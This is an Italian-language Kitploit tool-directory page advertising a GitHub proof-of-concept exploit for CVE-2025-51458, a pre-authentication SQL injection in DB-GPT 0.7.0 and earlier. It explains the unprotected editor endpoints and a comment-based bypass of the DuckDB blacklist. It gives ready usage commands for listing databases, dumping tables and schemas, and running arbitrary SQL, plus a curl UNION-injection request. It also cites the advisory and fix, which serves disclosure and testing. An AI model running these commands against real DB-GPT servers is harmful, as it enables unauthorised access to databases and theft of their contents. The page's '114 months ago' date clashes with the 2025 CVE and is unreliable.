Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-51458-exp — CVE-2025-51458 - PoC di iniezione SQL pre-autenticazione in DB-GPT | Kitploit
Strumenti/GitHubGitHub/q1uf3ng/cve-2025-51458-exp
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza dei Database
GitHubq1uf3ng/cve-2025-51458-exp

CVE-2025-51458-exp

CVE-2025-51458 - PoC di iniezione SQL pre-autenticazione in DB-GPT

Vedi Repository
114 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-51458-exp

SQL Injection pre-autenticazione in DB-GPT <= 0.7.0

Panoramica

Gli endpoint /api/v1/editor/sql/run e /api/v1/editor/chart/run accettano SQL arbitrario senza autenticazione. La blacklist sanitize_sql copre solo DuckDB; le connessioni MySQL, PostgreSQL e SQLite ricevono input utente grezzo senza alcun filtraggio. La blacklist di DuckDB stessa può essere aggirata tramite offuscamento con commenti (SEL/**/ECT).

Si tratta di un bypass di CVE-2024-10835 e CVE-2024-10901.

  • CVSS: 6.5 (Medio)
  • Tipo: CWE-89 (SQL Injection)
  • Autenticazione: Non richiesta (Pre-Auth)
  • Versioni interessate: DB-GPT <= 0.7.0
  • Corretto: PR #2650

Utilizzo

root@kitploit:~
# List databases
python3 exp.py http://target:5670 --list-dbs

# Execute SQL
python3 exp.py http://target:5670 <db_name> --sql "SELECT VERSION()"

# Dump tables
python3 exp.py http://target:5670 <db_name> --dump-tables

# Dump schema
python3 exp.py http://target:5670 <db_name> --dump-db

# DuckDB bypass
python3 exp.py http://target:5670 <db_name> --duckdb-bypass --sql "SELECT CURRENT_SETTING('access_mode')"

# Interactive mode
python3 exp.py http://target:5670 <db_name>

PoC Rapido

root@kitploit:~
curl -X POST "http://target:5670/api/v1/editor/sql/run" \
  -H "Content-Type: application/json" \
  -d '{"db_name":"test_db","sql":"SELECT 1 UNION ALL SELECT table_name FROM information_schema.tables--"}'

Riferimenti

  • NVD
  • Gecko Security Blog
  • Correzione PR #2650
Scarica lo strumento